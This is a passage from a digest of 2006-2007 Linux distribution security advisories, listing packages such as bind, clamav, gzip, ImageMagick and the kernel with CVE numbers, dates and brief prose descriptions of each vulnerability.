CVE #(s): CVE-2007-0493, CVE-2007-0494
Created: January 26, 2007
Updated: March 14, 2007
Description: The bind package is vulnerable to two remote denial of service
attacks in which attackers can cause the bind daemon to crash or exit
unexpectedly by providing malformed data to the daemon in a DNS request.
bluez-utils: hidd vulnerability
Package(s): bluez-utils
CVE #(s): CVE-2006-6899
Created: January 16, 2007
Updated: May 14, 2007
Description: hidd in BlueZ (bluez-utils) before 2.25 allows remote attackers
to obtain control of the Mouse and Keyboard Human Interface Device (HID) via
a certain configuration of two HID (PSM) endpoints, operating as a server,
aka HidAttack.
bugzilla: multiple vulnerabilities
Package(s): bugzilla
CVE #(s): CVE-2006-5453, CVE-2006-5454, CVE-2006-5455
Created: November 10, 2006
Updated: August 28, 2007
Description: Bugzilla has the following vulnerabilities:
Input data passed to various fields is not properly sanitized before being
passed back to users.
Users can gain unauthorized access to read attachment descriptions while
using diff mode.
HTTP GET and HTTP POST requests can be used to perform unauthorized actions
due to improper verification.
Input that is passed to showdependencygraph.cgi is not properly sanitized
before being returned to users.
busybox: insecure password generation
Package(s): busybox
CVE #(s): CVE-2006-1058
Created: May 5, 2006
Updated: May 2, 2007
Description: The BusyBox 1.1.1 passwd command does not use a proper salt when
generating passwords. This would create an instance where a brute force
attack could take very little time.
chmlib: remote execution of arbitrary code
Package(s): chmlib
CVE #(s): CVE-2007-0619
Created: February 27, 2007
Updated: February 28, 2007
Description: When certain CHM files that contain tables and objects stored in
pages are parsed by CHMlib, an unsanitized value is passed to the alloca()
function resulting in a shift of the stack pointer to arbitrary memory
locations. An attacker could entice a user to open a specially crafted CHM
file, resulting in the execution of arbitrary code with the permissions of
the user viewing the file.
clamav: directory traversal, denial of service
Package(s): clamav
CVE #(s): CVE-2007-0897, CVE-2007-0898
Created: February 20, 2007
Updated: March 7, 2007
Description: Clam AntiVirus ClamAV before 0.90 does not close open file
descriptors under certain conditions, which allows remote attackers to cause
a denial of service (file descriptor consumption and failed scans) via CAB
archives with a cabinet header record length of zero, which causes a
function to return without closing a file descriptor. (CVE-2007-0897)
Directory traversal vulnerability in clamd in Clam AntiVirus ClamAV before
0.90 allows remote attackers to overwrite arbitrary files via a .. (dot dot)
in the id MIME header parameter in a multi-part message. (CVE-2007-0898)
cpio: arbitrary code execution
Package(s): cpio
CVE #(s): CVE-2005-4268
Created: January 2, 2006
Updated: May 8, 2007
Description: Richard Harms discovered that cpio did not sufficiently validate
file properties when creating archives. Files with, for example, a very
large size caused a buffer overflow. By tricking a user or an automatic
backup system into putting a specially crafted file into a cpio archive, a
local attacker could probably exploit this to execute arbitrary code with
the privileges of the target user (which is likely root in an automatic
backup system).
Cyrus-SASL: DIGEST-MD5 pre-authentication denial of service
Package(s): cyrus-sasl
CVE #(s): CVE-2006-1721
Created: April 21, 2006
Updated: September 4, 2007
Description: Cyrus-SASL contains an unspecified vulnerability in the
DIGEST-MD5 process that could lead to a denial of service. An attacker could
possibly exploit this vulnerability by sending a specially crafted data
stream to the Cyrus-SASL server, resulting in a denial of service even if
the attacker is not able to authenticate.
dovecot: index cache file handling error
Package(s): dovecot
CVE #(s): CVE-2006-5973
Created: November 29, 2006
Updated: May 8, 2007
Description: The dovecot IMAP server has an error in its index cache file
handling code which could be exploited by an authenticated user to execute
arbitrary code. Only servers with the (non-default) mmap_disable=yes option
setting are vulnerable.
ekiga: format string vulnerability
Package(s): ekiga
CVE #(s): CVE-2007-1006, CVE-2007-0999
Created: February 21, 2007
Updated: March 30, 2007
Description: Ekiga contains a format string vulnerability in the code which
processes control messages from remote peers. If a user was running Ekiga
and listening for incoming calls, a remote attacker could send a crafted
call request, and execute arbitrary code with the user's privileges.
enigmail: memory allocation errors
Package(s): enigmail
CVE #(s): CVE-2006-5877
Created: February 23, 2007
Updated: February 28, 2007
Description: Mikhail Markin reported that enigmail incorrectly handled memory
allocations for certain large encrypted attachments. This caused Thunderbird
to crash and thus caused the entire message to be inaccessible.
fail2ban: denial of service
Package(s): fail2ban
CVE #(s): CVE-2006-6302
Created: February 16, 2007
Updated: July 30, 2007
Description: fail2ban 0.7.4 and earlier does not properly parse sshd log
files, which allows remote attackers to add arbitrary hosts to the
/etc/hosts.deny file and cause a denial of service by adding arbitrary IP
addresses to the sshd log file, as demonstrated by logging in to ssh using a
login name containing certain strings with an IP address.
fetchmail: password disclosure and DOS
Package(s): fetchmail
CVE #(s): CVE-2006-5867, CVE-2006-5974
Created: January 9, 2007
Updated: March 16, 2007
Description: Fetchmail suffers from a password disclosure vulnerability due
to a failure to use secure protocols (advisory) and a denial of service
vulnerability (advisory).
ffmpeg: buffer overflows
Package(s): ffmpeg
CVE #(s): CVE-2006-4799, CVE-2006-4800
Created: September 14, 2006
Updated: May 28, 2007
Description: The AVI processing code in FFmpeg has a number of buffer
overflow vulnerabilities. If an attacker can trick a user into loading a
specially crafted AVI, arbitrary code can be executed with the user's
privileges.
Mozilla stuff: multiple vulnerabilities
freeradius: several vulnerabilities
Package(s): freeradius
CVE #(s): CVE-2005-4745, CVE-2005-4746
Created: August 8, 2006
Updated: April 24, 2007
Description: Several remote vulnerabilities have been discovered in
freeradius, a high-performance RADIUS server, which may lead to SQL
injection or denial of service.
freetype: integer overflows
Package(s): freetype
CVE #(s): CVE-2006-0747, CVE-2006-1861, CVE-2006-2493, CVE-2006-2661,
CVE-2006-3467
Created: June 8, 2006
Updated: October 10, 2007
Description: The FreeType library has several integer overflow
vulnerabilities. If a user can be tricked into installing a specially
crafted font file, arbitrary code can be executed with the privilege of the
user.
gcc: file overwrite vulnerability
Package(s): gcc
CVE #(s): CVE-2006-3619
Created: September 6, 2006
Updated: March 14, 2008
Description: The fastjar utility found in the GNU compiler collection does
not perform adequate file path checking, allowing the creation or
overwriting of files outside of the current directory tree.
gd: buffer overflow
Package(s): gd
CVE #(s): CVE-2007-0455
Created: February 7, 2007
Updated: February 28, 2008
Description: The gd graphics library contains a buffer overflow which could
enable a remote attacker to execute arbitrary code. Note that various other
packages include code from gd and could also be vulnerable.
gdb: buffer overflow
Package(s): gdb
CVE #(s): CVE-2006-4146
Created: September 15, 2006
Updated: June 12, 2007
Description: A buffer overflow in dwarfread.c and dwarf2read.c debugging code
in GNU Debugger (GDB) 6.5 allows user-assisted attackers, or restricted
users, to execute arbitrary code via a crafted file with a location block
(DW_FORM_block) that contains a large number of operations.
gdm: improper file permissions
Package(s): gdm
CVE #(s): CVE-2006-1057
Created: April 19, 2006
Updated: May 2, 2007
Description: The .ICEauthority file may be created with the wrong ownership
and permissions; gdm 2.14.2 fixes the problem.
gnomemeeting: format string flaw
Package(s): gnomemeeting
CVE #(s): CVE-2007-1007
Created: February 20, 2007
Updated: March 5, 2007
Description: A format string flaw was found in the way GnomeMeeting processes
certain messages. If a user is running GnomeMeeting, a remote attacker who
can connect to GnomeMeeting could trigger this flaw and potentially execute
arbitrary code with the privileges of the user.
gnupg: stack overwrite
Package(s): gnupg
CVE #(s): CVE-2006-6235
Created: December 12, 2006
Updated: March 13, 2007
Description: A "stack overwrite" vulnerability in GnuPG (gpg) allows
attackers to execute arbitrary code via crafted OpenPGP packets that cause
GnuPG to dereference a function pointer from deallocated stack memory.
gv: stack-based buffer overflow
Package(s): gv
CVE #(s): CVE-2006-5864
Created: November 20, 2006
Updated: April 9, 2007
Description: Stack-based buffer overflow in the ps_gettext function in ps.c
for GNU gv 3.6.2, and possibly earlier versions, allows user-assisted
attackers to execute arbitrary code via a PostScript (PS) file with certain
headers that contain long comments, as demonstrated using the DocumentMedia
header.
gzip: multiple vulnerabilities
| Package(s): | gzip |
| CVE #(s): | CVE-2006-4334, CVE-2006-4335, CVE-2006-4336, CVE-2006-4337, CVE-2006-4338 |
| Created: | September 19, 2006 |
| Updated: | June 1, 2007 |
| Description: | Tavis Ormandy of the Google Security Team discovered two denial of service flaws in the way gzip expanded archive files. If a victim expanded a specially crafted archive, it could cause the gzip executable to hang or crash. Tavis Ormandy of the Google Security Team also discovered several code execution flaws in the way gzip expanded archive files. If a victim expanded a specially crafted archive, it could cause the gzip executable to crash or execute arbitrary code. |
| Alerts: | |
Comments (1 posted)
horde-kronolith: local file inclusion
| Package(s): | horde-kronolith |
| CVE #(s): | CVE-2006-6175 |
| Created: | January 17, 2007 |
| Updated: | March 7, 2008 |
| Description: | Kronolith contains a mistake in lib/FBView.php where a raw, unfiltered string is used instead of a sanitized string to view local files. An authenticated attacker could craft an HTTP GET request that uses directory traversal techniques to execute any file on the web server as PHP code, which could allow information disclosure or arbitrary code execution with the rights of the user running the PHP application (usually the webserver user). |
| Alerts: | |
Comments (none posted)
ImageMagick: buffer overflows
| Package(s): | ImageMagick |
| CVE #(s): | CVE-2006-5456 |
| Created: | October 31, 2006 |
| Updated: | March 8, 2007 |
| Description: | Multiple buffer overflows in GraphicsMagick before 1.1.7 and ImageMagick 6.0.7 allow user-assisted attackers to cause a denial of service and possibly execute arbitrary code via (1) a DCM image that is not properly handled by the ReadDCMImage function in coders/dcm.c, or (2) a PALM image that is not properly handled by the ReadPALMImage function in coders/palm.c. |
| Alerts: | |
Comments (2 posted)
imlib2: arbitrary code execution
| Package(s): | imlib2 |
| CVE #(s): | CVE-2006-4806, CVE-2006-4807, CVE-2006-4808, CVE-2006-4809 |
| Created: | November 6, 2006 |
| Updated: | August 13, 2007 |
| Description: | M. Joonas Pihlaja discovered that imlib2 did not sufficiently verify the validity of ARGB, JPG, LBM, PNG, PNM, TGA, and TIFF images. If a user were tricked into viewing or processing a specially crafted image with an application that uses imlib2, the flaws could be exploited to execute arbitrary code with the user's privileges. |
| Alerts: | |
Comments (none posted)
java: multiple vulnerabilities
| Package(s): | java |
| CVE #(s): | CVE-2006-4339, CVE-2006-4790, CVE-2006-6731, CVE-2006-6736, CVE-2006-6737, CVE-2006-6745 |
| Created: | January 18, 2007 |
| Updated: | June 8, 2007 |
| Description: | Java has multiple vulnerabilities, including: an RSA exponent padding attack vulnerability; two vulnerabilities which allow untrusted applets to access data in other applets; vulnerabilities that involve applets gaining privileges due to serialization bugs in the JRE; and buffer overflows in the Java image handling routines that can give attackers read/write/execute capabilities for local files. |
| Alerts: | |
Comments (1 posted)
kdelibs: integer overflow
| Package(s): | kdelibs |
| CVE #(s): | CVE-2006-4811 |
| Created: | October 18, 2006 |
| Updated: | March 5, 2007 |
| Description: | The KDE khtml library can pass untrusted parameters into Qt, allowing a hostile user to trigger an integer overflow there and execute arbitrary code. |
| Alerts: | |
Comments (none posted)
kdelibs: cross-site scripting
| Package(s): | kdelibs konqueror |
| CVE #(s): | CVE-2007-0537 |
| Created: | February 5, 2007 |
| Updated: | August 13, 2007 |
| Description: | Konqueror 3.5.5 does not properly parse HTML comments, which allows remote attackers to conduct cross-site scripting (XSS) attacks and bypass some XSS protection schemes by embedding certain HTML tags within a comment, a related issue to CVE-2007-0478. |
| Alerts: | |
Comments (none posted)
kernel: multiple vulnerabilities
| Package(s): | kernel |
| CVE #(s): | CVE-2006-5749, CVE-2006-4814, CVE-2006-6106 |
| Created: | January 5, 2007 |
| Updated: | May 7, 2008 |
| Description: | A security issue has been reported in the Linux kernel due to an error in drivers/isdn/i4l/isdn_ppp.c: the "isdn_ppp_ccp_reset_alloc_state()" function never initializes an event timer before scheduling it with the "add_timer()" function. The mincore function in the kernel does not properly lock access to user space, which has unspecified impact and attack vectors, possibly related to a deadlock. Another vulnerability has been reported in the Linux kernel caused by a boundary error within the handling of incoming CAPI messages in net/bluetooth/cmtp/capi.c. This can be exploited to overwrite certain kernel data structures. |
| Alerts: | |
Comments (none posted)
kernel: denial of service
| Package(s): | kernel |
| CVE #(s): | CVE-2006-4623 |
| Created: | October 18, 2006 |
| Updated: | November 14, 2007 |
| Description: | The kernel DVB layer can be caused to crash with maliciously-formatted unidirectional lightweight encapsulation (ULE) data. |
| Alerts: | |
Comments (none posted)
kernel: denial of service
| Package(s): | kernel |
| CVE #(s): | CVE-2006-0007, CVE-2007-0006 |
| Created: | February 15, 2007 |
| Updated: | November 14, 2007 |
| Description: | Linux kernel versions from 2.6.9 to 2.6.20 have a denial of service vulnerability. A remote attacker can cause the key_alloc_serial function's key serial number collision avoidance code to have a null dereference, resulting in a crash. |
| Alerts: | |
Comments (1 posted)
kernel: denial of service